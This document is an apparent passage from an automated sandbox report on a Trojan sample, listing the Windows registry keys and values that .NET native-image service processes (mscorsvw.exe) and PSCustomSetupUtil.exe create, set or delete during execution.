[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 E6 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F2 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F0 00 00 00 53 00 79"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 5F ED 75 73 12 8A C9 BE 63 05 C9 13 44 E1 9F"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
The Trojan deletes the following value(s) in the system registry:
The process mscorsvw.exe:2580 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
The process mscorsvw.exe:3072 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B FF A6 5D F6 AB AF F4 F8 BB BC 70 6B 64 DC F3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3724 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
The process mscorsvw.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB EA BF 2A 9C E9 35 2C 4D 7F DA 40 56 25 72 82"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3720 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
The process mscorsvw.exe:2516 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 1F 08 3D E5 D1 E2 7A CD C8 4F 80 9A 86 D6 F9"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3204 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
The process mscorsvw.exe:3784 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A C9 1A AF B5 F9 33 22 24 22 AF 26 FA 17 70 49"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3396 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 27 59 D7 66 A9 0A 08 00 19 DD 14 F7 DC 56 22"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3224 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
The process mscorsvw.exe:3036 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
The process mscorsvw.exe:2896 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD B9 65 89 E4 A9 00 53 2B 97 DD C3 BF 3B E0 F9"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 92 24 AA 1A 02 AF 2F 6E 4F FB 89 13 68 C2 AB"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "B4 1B 7D F1 C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
The process mscorsvw.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "1A BA 69 EC C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "B8 7B 06 EB C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 55 83 E0 4B 9C E6 49 71 14 48 0E F8 FC C6 D3"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]
The process PSCustomSetupUtil.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 41 1A F5 FA B9 58 73 37 59 F5 27 9B 10 C8 85"
